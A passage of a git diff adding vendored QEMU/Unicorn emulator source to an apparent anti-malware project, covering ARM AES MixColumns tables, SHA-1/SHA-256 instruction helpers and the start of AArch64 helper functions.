0x3a16162c, 0x3917172e, + 0x28181830, 0x2b191932, 0x2e1a1a34, 0x2d1b1b36, + 0x241c1c38, 0x271d1d3a, 0x221e1e3c, 0x211f1f3e, + 0x60202040, 0x63212142, 0x66222244, 0x65232346, + 0x6c242448, 0x6f25254a, 0x6a26264c, 0x6927274e, + 0x78282850, 0x7b292952, 0x7e2a2a54, 0x7d2b2b56, + 0x742c2c58, 0x772d2d5a, 0x722e2e5c, 0x712f2f5e, + 0x50303060, 0x53313162, 0x56323264, 0x55333366, + 0x5c343468, 0x5f35356a, 0x5a36366c, 0x5937376e, + 0x48383870, 0x4b393972, 0x4e3a3a74, 0x4d3b3b76, + 0x443c3c78, 0x473d3d7a, 0x423e3e7c, 0x413f3f7e, + 0xc0404080, 0xc3414182, 0xc6424284, 0xc5434386, + 0xcc444488, 0xcf45458a, 0xca46468c, 0xc947478e, + 0xd8484890, 0xdb494992, 0xde4a4a94, 0xdd4b4b96, + 0xd44c4c98, 0xd74d4d9a, 0xd24e4e9c, 0xd14f4f9e, + 0xf05050a0, 0xf35151a2, 0xf65252a4, 0xf55353a6, + 0xfc5454a8, 0xff5555aa, 0xfa5656ac, 0xf95757ae, + 0xe85858b0, 0xeb5959b2, 0xee5a5ab4, 0xed5b5bb6, + 0xe45c5cb8, 0xe75d5dba, 0xe25e5ebc, 0xe15f5fbe, + 0xa06060c0, 0xa36161c2, 0xa66262c4, 0xa56363c6, + 0xac6464c8, 0xaf6565ca, 0xaa6666cc, 0xa96767ce, + 0xb86868d0, 0xbb6969d2, 0xbe6a6ad4, 0xbd6b6bd6, + 0xb46c6cd8, 0xb76d6dda, 0xb26e6edc, 0xb16f6fde, + 0x907070e0, 0x937171e2, 0x967272e4, 0x957373e6, + 0x9c7474e8, 0x9f7575ea, 0x9a7676ec, 0x997777ee, + 0x887878f0, 0x8b7979f2, 0x8e7a7af4, 0x8d7b7bf6, + 0x847c7cf8, 0x877d7dfa, 0x827e7efc, 0x817f7ffe, + 0x9b80801b, 0x98818119, 0x9d82821f, 0x9e83831d, + 0x97848413, 0x94858511, 0x91868617, 0x92878715, + 0x8388880b, 0x80898909, 0x858a8a0f, 0x868b8b0d, + 0x8f8c8c03, 0x8c8d8d01, 0x898e8e07, 0x8a8f8f05, + 0xab90903b, 0xa8919139, 0xad92923f, 0xae93933d, + 0xa7949433, 0xa4959531, 0xa1969637, 0xa2979735, + 0xb398982b, 0xb0999929, 0xb59a9a2f, 0xb69b9b2d, + 0xbf9c9c23, 0xbc9d9d21, 0xb99e9e27, 0xba9f9f25, + 0xfba0a05b, 0xf8a1a159, 0xfda2a25f, 0xfea3a35d, + 0xf7a4a453, 0xf4a5a551, 0xf1a6a657, 0xf2a7a755, + 0xe3a8a84b, 0xe0a9a949, 0xe5aaaa4f, 0xe6abab4d, + 0xefacac43, 0xecadad41, 0xe9aeae47, 0xeaafaf45, + 0xcbb0b07b, 0xc8b1b179, 0xcdb2b27f, 0xceb3b37d, + 0xc7b4b473, 0xc4b5b571, 0xc1b6b677, 0xc2b7b775, + 0xd3b8b86b, 0xd0b9b969, 0xd5baba6f, 0xd6bbbb6d, + 0xdfbcbc63, 0xdcbdbd61, 0xd9bebe67, 0xdabfbf65, + 0x5bc0c09b, 0x58c1c199, 0x5dc2c29f, 0x5ec3c39d, + 0x57c4c493, 0x54c5c591, 0x51c6c697, 0x52c7c795, + 0x43c8c88b, 0x40c9c989, 0x45caca8f, 0x46cbcb8d, + 0x4fcccc83, 0x4ccdcd81, 0x49cece87, 0x4acfcf85, + 0x6bd0d0bb, 0x68d1d1b9, 0x6dd2d2bf, 0x6ed3d3bd, + 0x67d4d4b3, 0x64d5d5b1, 0x61d6d6b7, 0x62d7d7b5, + 0x73d8d8ab, 0x70d9d9a9, 0x75dadaaf, 0x76dbdbad, + 0x7fdcdca3, 0x7cdddda1, 0x79dedea7, 0x7adfdfa5, + 0x3be0e0db, 0x38e1e1d9, 0x3de2e2df, 0x3ee3e3dd, + 0x37e4e4d3, 0x34e5e5d1, 0x31e6e6d7, 0x32e7e7d5, + 0x23e8e8cb, 0x20e9e9c9, 0x25eaeacf, 0x26ebebcd, + 0x2fececc3, 0x2cededc1, 0x29eeeec7, 0x2aefefc5, + 0x0bf0f0fb, 0x08f1f1f9, 0x0df2f2ff, 0x0ef3f3fd, + 0x07f4f4f3, 0x04f5f5f1, 0x01f6f6f7, 0x02f7f7f5, + 0x13f8f8eb, 0x10f9f9e9, 0x15fafaef, 0x16fbfbed, + 0x1ffcfce3, 0x1cfdfde1, 0x19fefee7, 0x1affffe5, + }, { + /* Inverse MixColumns lookup table */ + 0x00000000, 0x0b0d090e, 0x161a121c, 0x1d171b12, + 0x2c342438, 0x27392d36, 0x3a2e3624, 0x31233f2a, + 0x58684870, 0x5365417e, 0x4e725a6c, 0x457f5362, + 0x745c6c48, 0x7f516546, 0x62467e54, 0x694b775a, + 0xb0d090e0, 0xbbdd99ee, 0xa6ca82fc, 0xadc78bf2, + 0x9ce4b4d8, 0x97e9bdd6, 0x8afea6c4, 0x81f3afca, + 0xe8b8d890, 0xe3b5d19e, 0xfea2ca8c, 0xf5afc382, + 0xc48cfca8, 0xcf81f5a6, 0xd296eeb4, 0xd99be7ba, + 0x7bbb3bdb, 0x70b632d5, 0x6da129c7, 0x66ac20c9, + 0x578f1fe3, 0x5c8216ed, 0x41950dff, 0x4a9804f1, + 0x23d373ab, 0x28de7aa5, 0x35c961b7, 0x3ec468b9, + 0x0fe75793, 0x04ea5e9d, 0x19fd458f, 0x12f04c81, + 0xcb6bab3b, 0xc066a235, 0xdd71b927, 0xd67cb029, + 0xe75f8f03, 0xec52860d, 0xf1459d1f, 0xfa489411, + 0x9303e34b, 0x980eea45, 0x8519f157, 0x8e14f859, + 0xbf37c773, 0xb43ace7d, 0xa92dd56f, 0xa220dc61, + 0xf66d76ad, 0xfd607fa3, 0xe07764b1, 0xeb7a6dbf, + 0xda595295, 0xd1545b9b, 0xcc434089, 0xc74e4987, + 0xae053edd, 0xa50837d3, 0xb81f2cc1, 0xb31225cf, + 0x82311ae5, 0x893c13eb, 0x942b08f9, 0x9f2601f7, + 0x46bde64d, 0x4db0ef43, 0x50a7f451, 0x5baafd5f, + 0x6a89c275, 0x6184cb7b, 0x7c93d069, 0x779ed967, + 0x1ed5ae3d, 0x15d8a733, 0x08cfbc21, 0x03c2b52f, + 0x32e18a05, 0x39ec830b, 0x24fb9819, 0x2ff69117, + 0x8dd64d76, 0x86db4478, 0x9bcc5f6a, 0x90c15664, + 0xa1e2694e, 0xaaef6040, 0xb7f87b52, 0xbcf5725c, + 0xd5be0506, 0xdeb30c08, 0xc3a4171a, 0xc8a91e14, + 0xf98a213e, 0xf2872830, 0xef903322, 0xe49d3a2c, + 0x3d06dd96, 0x360bd498, 0x2b1ccf8a, 0x2011c684, + 0x1132f9ae, 0x1a3ff0a0, 0x0728ebb2, 0x0c25e2bc, + 0x656e95e6, 0x6e639ce8, 0x737487fa, 0x78798ef4, + 0x495ab1de, 0x4257b8d0, 0x5f40a3c2, 0x544daacc, + 0xf7daec41, 0xfcd7e54f, 0xe1c0fe5d, 0xeacdf753, + 0xdbeec879, 0xd0e3c177, 0xcdf4da65, 0xc6f9d36b, + 0xafb2a431, 0xa4bfad3f, 0xb9a8b62d, 0xb2a5bf23, + 0x83868009, 0x888b8907, 0x959c9215, 0x9e919b1b, + 0x470a7ca1, 0x4c0775af, 0x51106ebd, 0x5a1d67b3, + 0x6b3e5899, 0x60335197, 0x7d244a85, 0x7629438b, + 0x1f6234d1, 0x146f3ddf, 0x097826cd, 0x02752fc3, + 0x335610e9, 0x385b19e7, 0x254c02f5, 0x2e410bfb, + 0x8c61d79a, 0x876cde94, 0x9a7bc586, 0x9176cc88, + 0xa055f3a2, 0xab58faac, 0xb64fe1be, 0xbd42e8b0, + 0xd4099fea, 0xdf0496e4, 0xc2138df6, 0xc91e84f8, + 0xf83dbbd2, 0xf330b2dc, 0xee27a9ce, 0xe52aa0c0, + 0x3cb1477a, 0x37bc4e74, 0x2aab5566, 0x21a65c68, + 0x10856342, 0x1b886a4c, 0x069f715e, 0x0d927850, + 0x64d90f0a, 0x6fd40604, 0x72c31d16, 0x79ce1418, + 0x48ed2b32, 0x43e0223c, 0x5ef7392e, 0x55fa3020, + 0x01b79aec, 0x0aba93e2, 0x17ad88f0, 0x1ca081fe, + 0x2d83bed4, 0x268eb7da, 0x3b99acc8, 0x3094a5c6, + 0x59dfd29c, 0x52d2db92, 0x4fc5c080, 0x44c8c98e, + 0x75ebf6a4, 0x7ee6ffaa, 0x63f1e4b8, 0x68fcedb6, + 0xb1670a0c, 0xba6a0302, 0xa77d1810, 0xac70111e, + 0x9d532e34, 0x965e273a, 0x8b493c28, 0x80443526, + 0xe90f427c, 0xe2024b72, 0xff155060, 0xf418596e, + 0xc53b6644, 0xce366f4a, 0xd3217458, 0xd82c7d56, + 0x7a0ca137, 0x7101a839, 0x6c16b32b, 0x671bba25, + 0x5638850f, 0x5d358c01, 0x40229713, 0x4b2f9e1d, + 0x2264e947, 0x2969e049, 0x347efb5b, 0x3f73f255, + 0x0e50cd7f, 0x055dc471, 0x184adf63, 0x1347d66d, + 0xcadc31d7, 0xc1d138d9, 0xdcc623cb, 0xd7cb2ac5, + 0xe6e815ef, 0xede51ce1, 0xf0f207f3, 0xfbff0efd, + 0x92b479a7, 0x99b970a9, 0x84ae6bbb, 0x8fa362b5, + 0xbe805d9f, 0xb58d5491, 0xa89a4f83, 0xa397468d, + } }; + union CRYPTO_STATE st; + int i; + st.l[0] = float64_val(env->vfp.regs[rm]); + st.l[1] = float64_val(env->vfp.regs[rm + 1]); + + assert(decrypt < 2); + + for (i = 0; i < 16; i += 4) { + st.words[i >> 2] = cpu_to_le32( + mc[decrypt][st.bytes[i]] ^ + rol32(mc[decrypt][st.bytes[i + 1]], 8) ^ + rol32(mc[decrypt][st.bytes[i + 2]], 16) ^ + rol32(mc[decrypt][st.bytes[i + 3]], 24)); + } + + env->vfp.regs[rd] = make_float64(st.l[0]); + env->vfp.regs[rd + 1] = make_float64(st.l[1]); +} + +/* + * SHA-1 logical functions + */ + +static uint32_t cho(uint32_t x, uint32_t y, uint32_t z) +{ + return (x & (y ^ z)) ^ z; +} + +static uint32_t par(uint32_t x, uint32_t y, uint32_t z) +{ + return x ^ y ^ z; +} + +static uint32_t maj(uint32_t x, uint32_t y, uint32_t z) +{ + return (x & y) | ((x | y) & z); +} + +void HELPER(crypto_sha1_3reg)(CPUARMState *env, uint32_t rd, uint32_t rn, + uint32_t rm, uint32_t op) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE n; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + n.l[0] = float64_val(env->vfp.regs[rn]); + n.l[1] = float64_val(env->vfp.regs[rn + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + if (op == 3) { /* sha1su0 */ + d.l[0] ^= d.l[1] ^ m.l[0]; + d.l[1] ^= n.l[0] ^ m.l[1]; + } else { + int i; + + for (i = 0; i < 4; i++) { + uint32_t t; + + switch (op) { + case 0: /* sha1c */ + t = cho(d.words[1], d.words[2], d.words[3]); + break; + case 1: /* sha1p */ + t = par(d.words[1], d.words[2], d.words[3]); + break; + case 2: /* sha1m */ + t = maj(d.words[1], d.words[2], d.words[3]); + break; + default: + g_assert_not_reached(); + } + t += rol32(d.words[0], 5) + n.words[0] + m.words[i]; + + n.words[0] = d.words[3]; + d.words[3] = d.words[2]; + d.words[2] = ror32(d.words[1], 2); + d.words[1] = d.words[0]; + d.words[0] = t; + } + } + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +void HELPER(crypto_sha1h)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + union CRYPTO_STATE m; + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + m.words[0] = ror32(m.words[0], 2); + m.words[1] = m.words[2] = m.words[3] = 0; + + env->vfp.regs[rd] = make_float64(m.l[0]); + env->vfp.regs[rd + 1] = make_float64(m.l[1]); +} + +void HELPER(crypto_sha1su1)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + d.words[0] = rol32(d.words[0] ^ m.words[1], 1); + d.words[1] = rol32(d.words[1] ^ m.words[2], 1); + d.words[2] = rol32(d.words[2] ^ m.words[3], 1); + d.words[3] = rol32(d.words[3] ^ d.words[0], 1); + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +/* + * The SHA-256 logical functions, according to + * http://csrc.nist.gov/groups/STM/cavp/documents/shs/sha256-384-512.pdf + */ + +static uint32_t S0(uint32_t x) +{ + return ror32(x, 2) ^ ror32(x, 13) ^ ror32(x, 22); +} + +static uint32_t S1(uint32_t x) +{ + return ror32(x, 6) ^ ror32(x, 11) ^ ror32(x, 25); +} + +static uint32_t s0(uint32_t x) +{ + return ror32(x, 7) ^ ror32(x, 18) ^ (x >> 3); +} + +static uint32_t s1(uint32_t x) +{ + return ror32(x, 17) ^ ror32(x, 19) ^ (x >> 10); +} + +void HELPER(crypto_sha256h)(CPUARMState *env, uint32_t rd, uint32_t rn, + uint32_t rm) +{ + int i; + union CRYPTO_STATE d; + union CRYPTO_STATE n; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + n.l[0] = float64_val(env->vfp.regs[rn]); + n.l[1] = float64_val(env->vfp.regs[rn + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + for (i = 0; i < 4; i++) { + uint32_t t = cho(n.words[0], n.words[1], n.words[2]) + n.words[3] + + S1(n.words[0]) + m.words[i]; + + n.words[3] = n.words[2]; + n.words[2] = n.words[1]; + n.words[1] = n.words[0]; + n.words[0] = d.words[3] + t; + + t += maj(d.words[0], d.words[1], d.words[2]) + S0(d.words[0]); + + d.words[3] = d.words[2]; + d.words[2] = d.words[1]; + d.words[1] = d.words[0]; + d.words[0] = t; + } + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +void HELPER(crypto_sha256h2)(CPUARMState *env, uint32_t rd, uint32_t rn, + uint32_t rm) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE n; + union CRYPTO_STATE m; + int i; + + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + n.l[0] = float64_val(env->vfp.regs[rn]); + n.l[1] = float64_val(env->vfp.regs[rn + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + for (i = 0; i < 4; i++) { + uint32_t t = cho(d.words[0], d.words[1], d.words[2]) + d.words[3] + + S1(d.words[0]) + m.words[i]; + + d.words[3] = d.words[2]; + d.words[2] = d.words[1]; + d.words[1] = d.words[0]; + d.words[0] = n.words[3 - i] + t; + } + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +void HELPER(crypto_sha256su0)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + d.words[0] += s0(d.words[1]); + d.words[1] += s0(d.words[2]); + d.words[2] += s0(d.words[3]); + d.words[3] += s0(m.words[0]); + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} + +void HELPER(crypto_sha256su1)(CPUARMState *env, uint32_t rd, uint32_t rn, + uint32_t rm) +{ + union CRYPTO_STATE d; + union CRYPTO_STATE n; + union CRYPTO_STATE m; + d.l[0] = float64_val(env->vfp.regs[rd]); + d.l[1] = float64_val(env->vfp.regs[rd + 1]); + n.l[0] = float64_val(env->vfp.regs[rn]); + n.l[1] = float64_val(env->vfp.regs[rn + 1]); + m.l[0] = float64_val(env->vfp.regs[rm]); + m.l[1] = float64_val(env->vfp.regs[rm + 1]); + + d.words[0] += s1(m.words[2]) + n.words[1]; + d.words[1] += s1(m.words[3]) + n.words[2]; + d.words[2] += s1(d.words[0]) + n.words[3]; + d.words[3] += s1(d.words[1]) + m.words[0]; + + env->vfp.regs[rd] = make_float64(d.l[0]); + env->vfp.regs[rd + 1] = make_float64(d.l[1]); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.c new file mode 100644 index 0000000..1d976c1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper-a64.c @@ -0,0 +1,528 @@ +/* + * AArch64 specific helpers + * + * Copyright (c) 2013 Alexander Graf + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "qemu/host-utils.h" +#include "sysemu/sysemu.h" +#include "qemu/bitops.h" +#include "internals.h" +#include "qemu/crc32c.h" + +/* C2.4.7 Multiply and divide */ +/* special cases for 0 and LLONG_MIN are mandated by the standard */ +uint64_t HELPER(udiv64)(uint64_t num, uint64_t den) +{ + if (den == 0) { + return 0; + } + return num / den; +} + +int64_t HELPER(sdiv64)(int64_t num, int64_t den) +{ + if (den == 0) { + return 0; + } + if (num == LLONG_MIN && den == -1) { + return LLONG_MIN; + } + return num / den; +} + +uint64_t HELPER(clz64)(uint64_t x) +{ + return clz64(x); +} + +uint64_t HELPER(cls64)(uint64_t x) +{ + return clrsb64(x); +} + +uint32_t HELPER(cls32)(uint32_t x) +{ + return clrsb32(x); +} + +uint32_t HELPER(clz32)(uint32_t x) +{ + return clz32(x); +} + +uint64_t HELPER(rbit64)(uint64_t x) +{ + /* assign the correct byte position */ + x = bswap64(x); + + /* assign the correct nibble position */ + x = ((x & 0xf0f0f0f0f0f0f0f0ULL) >> 4) + | ((x & 0x0f0f0f0f0f0f0f0fULL) << 4); + + /* assign the correct bit position */ + x = ((x & 0x8888888888888888ULL) >> 3) + | ((x & 0x4444444444444444ULL) >> 1) + | ((x & 0x2222222222222222ULL) << 1) + | ((x & 0x1111111111111111ULL) << 3); + + return x; +} + +/* Convert a softfloat float_relation_ (as returned by + * the float*_compare functions) to the correct ARM + * NZCV flag state. + */ +static inline uint32_t float_rel_to_flags(int res) +{ + uint64_t flags; + switch (res) { + case float_relation_equal: + flags = PSTATE_Z | PSTATE_C; + break; + case float_relation_less: + flags = PSTATE_N; + break; + case float_relation_greater: + flags = PSTATE_C; + break; + case float_relation_unordered: + default: + flags = PSTATE_C | PSTATE_V; + break; + } + return flags; +} + +uint64_t HELPER(vfp_cmps_a64)(float32 x, float32 y, void *fp_status) +{ + return float_rel_to_flags(float32_compare_quiet(x, y, fp_status)); +} + +uint64_t HELPER(vfp_cmpes_a64)(float32 x, float32 y, void *fp_status) +{ + return float_rel_to_flags(float32_compare(x, y, fp_status)); +} + +uint64_t HELPER(vfp_cmpd_a64)(float64 x, float64 y, void *fp_status) +{ + return float_rel_to_flags(float64_compare_quiet(x, y, fp_status)); +} + +uint64_t HELPER(vfp_cmped_a64)(float64 x, float64 y, void *fp_status) +{ + return float_rel_to_flags(float64_compare(x, y, fp_status)); +} + +float32 HELPER(vfp_mulxs)(float32 a, float32 b, void *fpstp) +{ + float_status *fpst = fpstp; + + if ((float32_is_zero(a) && float32_is_infinity(b)) || + (float32_is_infinity(a) && float32_is_zero(b))) { + /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ + return make_float32((1U << 30) | + ((float32_val(a) ^ float32_val(b)) & (1U << 31))); + } + return float32_mul(a, b, fpst); +} + +float64 HELPER(vfp_mulxd)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + + if ((float64_is_zero(a) && float64_is_infinity(b)) || + (float64_is_infinity(a) && float64_is_zero(b))) { + /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ + return make_float64((1ULL << 62) | + ((float64_val(a) ^ float64_val(b)) & (1ULL << 63))); + } + return float64_mul(a, b, fpst); +} + +uint64_t HELPER(simd_tbl)(CPUARMState *env, uint64_t result, uint64_t indices, + uint32_t rn, uint32_t numregs) +{ + /* Helper function for SIMD TBL and TBX. We have to do the table + * lookup part for the 64 bits worth of indices we're passed in. + * result is the initial results vector (either zeroes for TBL + * or some guest values for TBX), rn the register number where + * the table starts, and numregs the number of registers in the table. + * We return the results of the lookups. + */ + int shift; + + for (shift = 0; shift < 64; shift += 8) { + int index = extract64(indices, shift, 8); + if (index < 16 * numregs) { + /* Convert index (a byte offset into the virtual table + * which is a series of 128-bit vectors concatenated) + * into the correct vfp.regs[] element plus a bit offset + * into that element, bearing in mind that the table + * can wrap around from V31 to V0. + */ + int elt = (rn * 2 + (index >> 3)) % 64; + int bitidx = (index & 7) * 8; + uint64_t val = extract64(env->vfp.regs[elt], bitidx, 8); + + result = deposit64(result, shift, 8, val); + } + } + return result; +} + +/* 64bit/double versions of the neon float compare functions */ +uint64_t HELPER(neon_ceq_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float64_eq_quiet(a, b, fpst); +} + +uint64_t HELPER(neon_cge_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float64_le(b, a, fpst); +} + +uint64_t HELPER(neon_cgt_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float64_lt(b, a, fpst); +} + +/* Reciprocal step and sqrt step. Note that unlike the A32/T32 + * versions, these do a fully fused multiply-add or + * multiply-add-and-halve. + */ +#define float32_two make_float32(0x40000000) +#define float32_three make_float32(0x40400000) +#define float32_one_point_five make_float32(0x3fc00000) + +#define float64_two make_float64(0x4000000000000000ULL) +#define float64_three make_float64(0x4008000000000000ULL) +#define float64_one_point_five make_float64(0x3FF8000000000000ULL) + +float32 HELPER(recpsf_f32)(float32 a, float32 b, void *fpstp) +{ + float_status *fpst = fpstp; + + a = float32_chs(a); + if ((float32_is_infinity(a) && float32_is_zero(b)) || + (float32_is_infinity(b) && float32_is_zero(a))) { + return float32_two; + } + return float32_muladd(a, b, float32_two, 0, fpst); +} + +float64 HELPER(recpsf_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + + a = float64_chs(a); + if ((float64_is_infinity(a) && float64_is_zero(b)) || + (float64_is_infinity(b) && float64_is_zero(a))) { + return float64_two; + } + return float64_muladd(a, b, float64_two, 0, fpst); +} + +float32 HELPER(rsqrtsf_f32)(float32 a, float32 b, void *fpstp) +{ + float_status *fpst = fpstp; + + a = float32_chs(a); + if ((float32_is_infinity(a) && float32_is_zero(b)) || + (float32_is_infinity(b) && float32_is_zero(a))) { + return float32_one_point_five; + } + return float32_muladd(a, b, float32_three, float_muladd_halve_result, fpst); +} + +float64 HELPER(rsqrtsf_f64)(float64 a, float64 b, void *fpstp) +{ + float_status *fpst = fpstp; + + a = float64_chs(a); + if ((float64_is_infinity(a) && float64_is_zero(b)) || + (float64_is_infinity(b) && float64_is_zero(a))) { + return float64_one_point_five; + } + return float64_muladd(a, b, float64_three, float_muladd_halve_result, fpst); +} + +/* Pairwise long add: add pairs of adjacent elements into + * double-width elements in the result (eg _s8 is an 8x8->16 op) + */ +uint64_t HELPER(neon_addlp_s8)(uint64_t a) +{ + uint64_t nsignmask = 0x0080008000800080ULL; + uint64_t wsignmask = 0x8000800080008000ULL; + uint64_t elementmask = 0x00ff00ff00ff00ffULL; + uint64_t tmp1, tmp2; + uint64_t res, signres; + + /* Extract odd elements, sign extend each to a 16 bit field */ + tmp1 = a & elementmask; + tmp1 ^= nsignmask; + tmp1 |= wsignmask; + tmp1 = (tmp1 - nsignmask) ^ wsignmask; + /* Ditto for the even elements */ + tmp2 = (a >> 8) & elementmask; + tmp2 ^= nsignmask; + tmp2 |= wsignmask; + tmp2 = (tmp2 - nsignmask) ^ wsignmask; + + /* calculate the result by summing bits 0..14, 16..22, etc, + * and then adjusting the sign bits 15, 23, etc manually. + * This ensures the addition can't overflow the 16 bit field. + */ + signres = (tmp1 ^ tmp2) & wsignmask; + res = (tmp1 & ~wsignmask) + (tmp2 & ~wsignmask); + res ^= signres; + + return res; +} + +uint64_t HELPER(neon_addlp_u8)(uint64_t a) +{ + uint64_t tmp; + + tmp = a & 0x00ff00ff00ff00ffULL; + tmp += (a >> 8) & 0x00ff00ff00ff00ffULL; + return tmp; +} + +uint64_t HELPER(neon_addlp_s16)(uint64_t a) +{ + int32_t reslo, reshi; + + reslo = (int32_t)(int16_t)a + (int32_t)(int16_t)(a >> 16); + reshi = (int32_t)(int16_t)(a >> 32) + (int32_t)(int16_t)(a >> 48); + + return (uint32_t)reslo | (((uint64_t)reshi) << 32); +} + +uint64_t HELPER(neon_addlp_u16)(uint64_t a) +{ + uint64_t tmp; + + tmp = a & 0x0000ffff0000ffffULL; + tmp += (a >> 16) & 0x0000ffff0000ffffULL; + return tmp; +} + +/* Floating-point reciprocal exponent - see FPRecpX in ARM ARM */ +float32 HELPER(frecpx_f32)(float32 a, void *fpstp) +{ + float_status *fpst = fpstp; + uint32_t val32, sbit; + int32_t exp; + + if (float32_is_any_nan(a)) { + float32 nan = a; + if (float32_is_signaling_nan(a)) { + float_raise(float_flag_invalid, fpst); + nan = float32_maybe_silence_nan(a); + } + if (fpst->default_nan_mode) { + nan = float32_default_nan; + } + return nan; + } + + val32 = float32_val(a); + sbit = 0x80000000ULL & val32; + exp = extract32(val32, 23, 8); + + if (exp == 0) { + return make_float32(sbit | (0xfe << 23)); + } else { + return make_float32(sbit | (~exp & 0xff) << 23); + } +} + +float64 HELPER(frecpx_f64)(float64 a, void *fpstp) +{ + float_status *fpst = fpstp; + uint64_t val64, sbit; + int64_t exp; + + if (float64_is_any_nan(a)) { + float64 nan = a; + if (float64_is_signaling_nan(a)) { + float_raise(float_flag_invalid, fpst); + nan = float64_maybe_silence_nan(a); + } + if (fpst->default_nan_mode) { + nan = float64_default_nan; + } + return nan; + } + + val64 = float64_val(a); + sbit = 0x8000000000000000ULL & val64; + exp = extract64(float64_val(a), 52, 11); + + if (exp == 0) { + return make_float64(sbit | (0x7feULL << 52)); + } else { + return make_float64(sbit | (~exp & 0x7ffULL) << 52); + } +} + +float32 HELPER(fcvtx_f64_to_f32)(float64 a, CPUARMState *env) +{ + /* Von Neumann rounding is implemented by using round-to-zero + * and then setting the LSB of the result if Inexact was raised. + */ + float32 r; + float_status *fpst = &env->vfp.fp_status; + float_status tstat = *fpst; + int exflags; + + set_float_rounding_mode(float_round_to_zero, &tstat); + set_float_exception_flags(0, &tstat); + r = float64_to_float32(a, &tstat); + r = float32_maybe_silence_nan(r); + exflags = get_float_exception_flags(&tstat); + if (exflags & float_flag_inexact) { + r = make_float32(float32_val(r) | 1); + } + exflags |= get_float_exception_flags(fpst); + set_float_exception_flags(exflags, fpst); + return r; +} + +/* 64-bit versions of the CRC helpers. Note that although the operation + * (and the prototypes of crc32c() and crc32() mean that only the bottom + * 32 bits of the accumulator and result are used, we pass and return + * uint64_t for convenience of the generated code. Unlike the 32-bit + * instruction set versions, val may genuinely have 64 bits of data in it. + * The upper bytes of val (above the number specified by 'bytes') must have + * been zeroed out by the caller. + */ +uint64_t HELPER(crc32_64)(uint64_t acc, uint64_t val, uint32_t bytes) +{ + uint8_t buf[8]; + + stq_le_p(buf, val); + + /* zlib crc32 converts the accumulator and output to one's complement. */ + // return crc32(acc ^ 0xffffffff, buf, bytes) ^ 0xffffffff; + return 0; // FIXME +} + +uint64_t HELPER(crc32c_64)(uint64_t acc, uint64_t val, uint32_t bytes) +{ + uint8_t buf[8]; + + stq_le_p(buf, val); + + /* Linux crc32c converts the output to one's complement. */ + return crc32c(acc, buf, bytes) ^ 0xffffffff; +} + +#if !defined(CONFIG_USER_ONLY) + +/* Handle a CPU exception. */ +void aarch64_cpu_do_interrupt(CPUState *cs) +{ + CPUARMState *env = cs->env_ptr; + ARMCPU *cpu = ARM_CPU(env->uc, cs); + unsigned int new_el = arm_excp_target_el(cs, cs->exception_index); + target_ulong addr = env->cp15.vbar_el[new_el]; + unsigned int new_mode = aarch64_pstate_mode(new_el, true); + int i; + + if (arm_current_el(env) < new_el) { + if (env->aarch64) { + addr += 0x400; + } else { + addr += 0x600; + } + } else if (pstate_read(env) & PSTATE_SP) { + addr += 0x200; + } + + arm_log_exception(cs->exception_index); + qemu_log_mask(CPU_LOG_INT, "...from EL%d\n", arm_current_el(env)); + if (qemu_loglevel_mask(CPU_LOG_INT) + && !excp_is_internal(cs->exception_index)) { + qemu_log_mask(CPU_LOG_INT, "...with ESR 0x%" 